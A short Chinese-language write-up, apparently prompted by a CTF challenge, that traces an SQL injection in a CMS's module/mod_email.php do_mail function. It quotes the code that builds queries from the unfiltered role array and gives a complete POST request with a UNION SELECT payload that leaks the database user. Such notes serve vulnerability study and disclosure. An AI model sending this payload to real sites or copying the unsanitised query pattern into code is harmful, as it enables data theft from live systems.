CTF比赛中出了这个CMS的题 下载回源码看了下
问题出在module/mod_email.php
第147行左右
public function do_mail(){ global $db; $title = ParamHolder::get("title"); $msg = ParamHolder::get("email_s"); $msg .= ParamHolder::get("email_m"); $roles = ParamHolder::get("role"); $type = ParamHolder::get("type"); $user_email = ParamHolder::get('users'); $send_id = SessionHolder::get("user/id"); $time = time(); $ok = 0; .............省略 else{ foreach ($roles as $k=>$row){ $sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'"; $res = $db->query($sql); $emails = $res->fetchRows(); if (!empty($emails)) { foreach ($emails as $eml){ if($this->send_mail($title,$msg,$eml['email'])){ $ok++; $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,1,'{$time}')"; $db->query($sql); }else{ $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,0,'{$time}')"; $db->query($sql); $s_err[] = $eml['login']; } } }else{
|
SQL语句$sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'";
其中SQL语句中的$row
为遍历$roles
后的内容,没有做过滤导致SQL注入
Payload:
POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Host: localhost Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 Content-Length: 112 title=aa&email_s=a&email_m=a&type=a&users=aaaa'|aaa&role[]=abdc}'+union+select+ 1,user(),3#
|